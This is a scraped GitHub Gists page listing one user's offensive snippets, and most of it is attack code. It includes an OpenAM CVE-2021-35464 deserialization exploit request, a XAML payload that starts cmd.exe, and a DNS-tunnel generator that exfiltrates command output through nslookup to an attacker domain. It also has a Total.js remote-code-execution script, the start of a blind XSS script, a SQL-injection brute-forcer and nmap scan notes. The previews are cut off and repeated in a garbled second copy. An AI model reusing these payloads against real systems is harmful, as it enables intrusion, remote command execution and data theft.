$4D tuo4n8

## CVE-2021-35464.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                tuo4n8
                / CVE-2021-35464.md
            
            
              Created
              July 2, 2021 07:03
            
          
    POST /openam/ccversion/Version HTTP/1.1
Host: openam.test.local:8080
Content-Type: application/x-www-form-urlencoded
me0me0hakxor: id 
Content-Length: 8293

jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH

  
## xaml-exploit.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                tuo4n8
                / xaml-exploit.md
            
            
              Last active
              June 6, 2020 02:05
            
          
    Execute command

<ResourceDictionary
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:System="clr-namespace:System;assembly=mscorlib"
xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
  <ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start">
    <ObjectDataProvider.MethodParameters>
      <System:String>cmd.exe</System:String>

  
## dnstun.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                tuo4n8
                / dnstun.md
            
            
              Last active
              July 16, 2021 03:19
            
              
                DNS-TUNNEL.MD
              
          
Gen Command

import sys, time, threading, base64

def createBashBase64Payload(domainDNS, linuxCommand):
    bashCommand = '''i=0;d="''' + domainDNS + '''";z=$(for j in $(''' + linuxCommand +''' |base64);do echo $j;done);for j in $(echo $z|sed 's/$/E-F/'|sed -r 's/(.{63})/\\1\\n/g'|sed 's/=/-/g'|sed 's/+/PLUS/g'); do nslookup `printf "%04d" $i`.$j.$d;i=$((i+1));done;'''
    return "echo " + base64.b64encode(bashCommand) + "|openssl base64 -d |sh"


def createPowershellBase64Payload(domainDNS, windowsCommand):

  
## total-js-rce.py
import requests
import sys

session = requests.Session()

def request(cookie,cmd):
    headers = {"Content-Type":"application/json; charset=utf-8"}
    cookies = {"__admin":cookie}
    payload = "\"<script total>global.process.mainModule.require(\'child_process\').exec('%s');</script>\"" %(cmd)
    rawBody = '{"name":"meomeo","body":%s,"category":"Inline"}' %(payload)

## xss_blind.js
<script>
function ascii_to_hexa(str) {
    var arr1 = [];
    for (var n = 0, l = str.length; n < l; n++) {
        var hex = Number(str.charCodeAt(n)).toString(16);
        arr1.push(hex);
    }
    return arr1.join('');
}

## sqli-binary.py
import requests
import string

session = requests.Session()
proxies = {
      'http': "socks5://127.0.0.1:5050",
      'https': "socks5://127.0.0.1:5050"
      }

strings = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&()*+,-./:;<=>?@[\\]^_`{|}~'

## scan_port.py
# Scan
# nmap -v --min-rate 10000  -Pn --top-ports 10000 *ip* -oG  *dir*
# nmap -v --min-rate 10000  -p- *ip* -oG  *dir*

# Search
# cat * | grep -Erl "/open/tcp//http/"
# cat * | grep -Erl "/open/tcp//http//Elasticsearch"
# cat * | grep -Erl "open/tcp//rmiregistry"

import os
	import requests
	import sys

	session = requests.Session()

	def request(cookie,cmd):
	headers = {"Content-Type":"application/json; charset=utf-8"}
	cookies = {"__admin":cookie}
	payload = "\"<script total>global.process.mainModule.require(\'child_process\').exec('%s');</script>\"" %(cmd)
	rawBody = '{"name":"meomeo","body":%s,"category":"Inline"}' %(payload)
	<script>
	function ascii_to_hexa(str) {
	var arr1 = [];
	for (var n = 0, l = str.length; n < l; n++) {
	var hex = Number(str.charCodeAt(n)).toString(16);
	arr1.push(hex);
	}
	return arr1.join('');
	}
	import requests
	import string

	session = requests.Session()
	proxies = {
	'http': "socks5://127.0.0.1:5050",
	'https': "socks5://127.0.0.1:5050"
	}

	strings = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&()*+,-./:;<=>?@[\\]^_`{\|}~'
	# Scan
	# nmap -v --min-rate 10000 -Pn --top-ports 10000 ip -oG dir
	# nmap -v --min-rate 10000 -p- ip -oG dir

	# Search
	# cat * \| grep -Erl "/open/tcp//http/"
	# cat * \| grep -Erl "/open/tcp//http//Elasticsearch"
	# cat * \| grep -Erl "open/tcp//rmiregistry"

	import os